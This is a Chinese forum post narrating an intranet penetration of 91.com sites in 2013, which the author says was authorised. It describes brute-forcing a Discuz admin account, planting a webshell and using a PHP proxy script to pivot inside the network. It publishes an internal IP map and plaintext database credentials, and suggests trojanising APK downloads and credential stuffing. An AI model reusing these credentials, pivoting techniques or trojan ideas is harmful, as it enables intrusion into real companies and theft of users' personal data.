HanDs
管理员

记得13年初对百度91的一次内网漫游 



该次渗透测试经过福建网龙公司授权,该系列漏洞已于2013年中旬修复完毕!
听说百度收购了91了,好吧。从没到百度提交过漏洞。 今天开始这一系列的开头吧。
要渗透一个站,就必须要知道它有那些子域名,那些站存在漏洞。
个人习惯比较喜欢找开源系统:如Discuz、PHPwind、PHPCMS、DEDECMS
首先Google搜索、site:(91.com) Powered by Discuz!

好吧,直接给我蹦出来一个 sm.91.com 那就直接拿它开刀了。
出现一个用户名为:634861983 管理员
由于后台未设置验证码等预防暴力破解的方式,使用burpsuite工具对账户“634861983”进行暴力破解
经过一段时间的等待,对比响应头字节的信息成功登陆了管理后台,该用户拥有管理员权限后使用修改UC_KEY的方式向uc_server的config.inc.php插入了一句话木马,成功拿下该网站的WebSHELL,从而开始了这段内网漫游之旅!
在内网渗透中,当拿下一台内网权限的情况下,尽量去寻找可用信息 例如 配置文件/svn/或其他对内网有帮助的信息!
这里获取了很多91的子域名与敏感信息,由于是内网地址,那么只能写个脚本来进行转发,比如php的file_get_contents函数就可以帮助你实现获取内网的web页面.
<?php$url = $_GET['url'];echo file_get_contents($url);
url/url.php?=http://10.31.247.197
内网渗透中,获取数据库中其他管理员信息可结合社会工程学等技巧对下一个系统进行攻击.
反反复复的查阅配置文件,找出对应的web服务 例如player.91.com等等都可修改数据达到替换apk下载地址对手机进行木马种植.
渗透Hiapk:
经过前节章的数据泄露,把目标对准了bbs.hiapk.com
还是Discuz程序,我对DZ程序那么有缘么?好吧,既然有缘.那就开搞吧....
首先,主站安全,这是一定的,经过bbs.sm.91.com的内网侦探。发现了hiapk的架构
(数据库地址是经过DZ报错,直接把地址给我爆出来了,好吧..)
主站是负载均衡,所以暂且不看.
(貌似废话有点多了?)
结合Google搜索,发现有一处文件解析失败(upload.*.hiapk.com)现已修复
直接出现了HIAPK的数据库连接信息!!
10.1.242.111******d6dAY46b****tmbq
内网怎么办?还好bbs.sm.91.com 作为跳板,成功连接数据库!!

2000W数据,应该是主库了,然后通过uc update了admin的密码,成功进入后台!!

当然还是安装插件获得了shell,由于负载均衡,最后把shell删了,我是好同志.没脱裤!真的!!
插件拿shell细节:http://lcx.cc/?i=3750
前一章我们成功渗透了bbs.hiapk.com,经过gg搜索,发现还有一个game.bbs.hiapk.com 这样的域名,还居然是个论坛,那么今天这章我们就来搞它。
1、前期准备 由于前面有bbs.hiapk.com数据的支持,改掉了ADMIN的密码。所以渗透这个站也就是很简单的。
当然还是插件拿SHELL:http://lcx.cc/?i=3750
WEBSHELL:
PS:一个监控系统引发的血案!!
在渗透:bbs.sm.91.com 后,找到一个目录
监控系统:
218.5.2.219=91Note/龙易缘分/591up记忆类通用平台/手机助手/公司出口/安卓端的共通日志系统/游戏大众评测项目/福建省广播电视大学项目218.66.59.233=公司出口220.250.21.82=公司出口/手机助手/福建省广播电视大学项目/安卓端的共通日志系统10.31.247.134=算命121.207.247.134=算命10.1.242.217=UAP121.207.242.217=UAP10.1.242.49=UAP121.207.242.49=UAP121.207.242.223=UAP10.1.242.223=UAP121.207.242.224=UAP10.1.242.224=UAP121.207.242.209=UAP10.1.242.209=UAP121.207.242.199=UAP10.1.242.199=UAP121.207.242.51=UAP10.1.242.51=UAP121.207.242.125=UAP121.207.242.124=UAP121.207.242.211=UAP121.207.242.207=91相册10.1.242.6=91Note/算命/算命web/手机算命web/91看书社区/Space(.NET)/WEB理财/积分系统/91英语web/悬赏系统10.31.247.132=理财客户端/91Note121.207.247.132=理财客户端/91Note10.31.247.199=91英语/理财客户端10.2.103.59=无线10.1.242.60=无线/手机助手10.2.104.144=91Note/算命/算命web/手机算命web/91看书社区/Space(.NET)/WEB理财/积分系统/91英语web/悬赏系统10.1.242.191=WEB理财121.207.242.191=WEB理财10.1.250.151=91U/SAAS网音121.207.250.151=91U/SAAS网音121.207.250.152=OAP项目/91U/SAAS网音121.207.250.228=91U/SAAS网音10.1.250.228=91U/SAAS网音121.207.250.229=91U/SAAS网音10.1.250.229=91U/SAAS网音10.1.250.14=91U/SAAS网音121.207.250.14=91U/SAAS网音27.24.190.5=91U/SAAS网音/福建省广播电视大学项目27.24.190.8=91U/SAAS网音27.24.190.4=91U/SAAS网音58.22.104.139=91U/SAAS网音10.1.250.163=91U/SAAS网音121.207.250.163=91U/SAAS网音121.207.250.230=91U/SAAS网音111.4.117.43=91U/SAAS网音111.4.117.44=91U/SAAS网音10.1.242.216=算命论坛/91英语web/相册121.207.242.216=算命论坛/91英语web/相册121.207.242.60=无线/手机助手58.22.103.59=无线121.207.242.6=91Note/算命/算命web/手机算命web/91看书社区/Space(.NET)/WEB理财/积分系统/91英语web/悬赏系统10.1.240.77=无线121.207.240.77=无线10.1.242.234=无线121.207.242.234=无线58.22.104.144=91Note/算命/算命web/手机算命web/91看书社区/Space(.NET)/WEB理财/积分系统/91英语web/悬赏系统/10.1.242.201=无线121.207.242.201=无线121.207.247.199=91英语/理财客户端121.207.242.48=人力资源平台/司法考试/驾照考试/591up公务员/无线/项目管理PMP10.1.242.48=人力资源平台/司法考试/驾照考试/591up公务员/无线/项目管理PMP10.1.20.66=项目管理PMP121.207.254.37=项目管理PMP10.1.11.209=公会121.207.254.157=公会121.207.254.151=公会10.2.144.58=91Note10.2.105.150=91Note10.1.242.33=591up公务员(新)58.22.105.150=91Note27.24.190.6=91Note/家校通/crm111.4.117.36=91Note/家校通/crm10.1.250.118=无线10.2.105.156=无线121.207.250.16=无线10.1.250.16=无线121.207.250.118=无线58.22.105.156=无线10.1.240.207=无线10.1.240.208=无线10.1.242.155=无线58.22.103.40=无线/手机助手10.2.103.40=无线/手机助手10.1.250.222=无线/无线(开发者后台)/dev.91.com121.207.250.222=无线/无线(开发者后台)/dev.91.com10.2.105.68=无线/无线(开发者后台)/dev.91.com58.22.103.29=无线/无线(开发者后台)/dev.91.com121.207.254.92=天铭/简体91.com/我的91121.207.254.99=天铭/简体91.com/我的91121.207.254.109=天铭/简体91.com/我的91121.207.254.104=天铭/简体91.com/我的91121.207.254.100=天铭/简体91.com/我的91121.207.254.73=天铭/简体91.com/我的91121.207.254.102=天铭/简体91.com/我的91/游戏大众评测项目121.207.254.96=天铭/简体91.com/我的91/游戏大众评测项目10.1.254.82=天铭/简体91.com/我的91/游戏大众评测项目121.207.254.82=天铭/简体91.com/我的91/游戏大众评测项目121.207.254.68=天铭/简体91.com/我的91/91卡通频道/91卡通频道121.207.254.124=天铭/简体91.com/我的91/游戏大众评测项目121.207.254.107=天铭/简体91.com/我的91/游戏大众评测项目121.207.242.33=591up公务员(新)121.207.254.143=ea.91.com/家校通/crm121.207.254.69=91卡通频道10.1.250.252=OAP项目10.1.20.142=家校通/crm121.207.250.157=家校通/crm10.1.250.157=家校通/crm121.207.250.56=家校通/crm10.1.250.56=家校通/crm121.207.247.135=91note/龙易缘分/591up记忆类通用平台/91spark10.31.247.135=91note/龙易缘分/591up记忆类通用平台/91spark121.207.240.17=91UP180.139.136.202=天河部落121.207.240.42=天河部落121.207.254.181=手机助手121.207.254.22=手机助手121.207.242.149=手机助手121.207.242.19=手机助手121.207.242.87=手机助手58.22.103.39=手机助手121.207.254.145=手机助手121.207.242.102=手机助手58.22.105.149=手机助手121.207.250.167=福建省广播电视大学项目10.1.250.167=福建省广播电视大学项目121.207.250.168=福建省广播电视大学项目10.1.250.168=福建省广播电视大学项目58.22.103.176=游戏大众评测项目222.77.191.158=91相册222.77.191.160=91相册222.77.191.200=91相册  27.24.190.3=一起成长网111.4.117.42=教育智信58.22.109.135=91积金监控配置文件:#mysql信息[MYSQL_242_50_3306]name=MYSQL_242_50_3306#mysql服务ipip=10.1.242.50#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=uap_server#mysql信息[MYSQL_242_229_3306]name=MYSQL_242_229_3306#mysql服务ipip=10.1.242.229#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=uap_server#游戏mysql信息[MYSQL_242_215_3306]name=MYSQL_242_215_3306#mysql服务ipip=10.1.242.215#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=game#游戏mysql信息[MYSQL_242_231_3306]name=MYSQL_242_231_3306#mysql服务ipip=10.1.242.231#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=cnjz#游戏mysql信息[MYSQL_242_214_3306]name=MYSQL_242_214_3306#mysql服务ipip=10.1.242.214#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=game#游戏mysql信息[MYSQL_242_230_3306]name=MYSQL_242_230_3306#mysql服务ipip=10.1.242.230#mysql服务端口号port=3306#mysql登录帐号user=uap#mysql登录密码password=Fxu5FTZ9Atq74zHR#mysql中需访问的数据库名称db=cnjz#相册mysql信息[MYSQL_242_205_3306]name=MYSQL_242_205_3306#mysql服务ipip=10.1.242.205#mysql服务端口号port=3306#mysql登录帐号user=album#mysql登录密码password=5JKYxutxSCsBArmy#mysql中需访问的数据库名称db=uap_album#mysql信息[MYSQL_247_196_3306]name=MYSQL_247_196_3306#mysql服务ipip=10.31.247.196#mysql服务端口号port=3306#mysql登录帐号user=scs91#mysql登录密码password=BwQ2yFWv5CRApjrF#mysql中需访问的数据库名称db=divdb#mysql信息[MYSQL_20_89_3306]name=MYSQL_20_89_3306#mysql服务ipip=10.1.20.89#mysql服务端口号port=3306#mysql登录帐号user=scs91#mysql登录密码password=BwQ2yFWv5CRApjrF#mysql中需访问的数据库名称db=nd_crm#mysql信息[MYSQL_242_190_3306]name=MYSQL_242_190_3306#mysql服务ipip=10.1.242.190#mysql服务端口号port=3306#mysql登录帐号user=scs91#mysql登录密码password=BwQ2yFWv5CRApjrF#mysql中需访问的数据库名称db=babybook#mysql信息[MYSQL_247_196_3307]name=MYSQL_247_196_3307#mysql服务ipip=10.31.247.196#mysql服务端口号port=3307#mysql登录帐号user=scs91#mysql登录密码password=BwQ2yFWv5CRApjrF#mysql中需访问的数据库名称db=ndmoney[MYSQL_250_56_3306]name=MYSQL_250_56_3306#mysql服务ipip=10.1.250.56#mysql服务端口号port=3306#mysql登录帐号user=weather_php#mysql登录密码password=fMYTUM9FXEW6W3U3#mysql中需访问的数据库名称db=weatherdb[MYSQL_242_190_3307]name=MYSQL_242_190_3307#mysql服务ipip=10.1.242.190#mysql服务端口号port=3307#mysql登录帐号user=zx_coach#mysql登录密码password=JZ5PtCbuu29UKuE8#mysql中需访问的数据库名称db=zx_yr
然后连接数据库:

成功连接91的oss数据库,包含91所有产品登录信息 账号、密码、邮箱、身份证等.
钱财操作:

推送信息:
写在最后:
内网渗透不仅仅是靠你有新的0day,还要结合多方面信息同时进行,比如拿到上述用户名和密码撞库91内网的oa系统 email系统,渗透至办公网,But 我只是想拿到数据而已,所以就没有继续进行测试...


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
记得 1 3 年初 百度 9 1 一次 漫游
#1楼
发帖时间:2016-8-27   |   查看数:0   |   回复数:1
YHJ12345
圣百合LV21

2016-9-29 #2楼
游客组
快速回复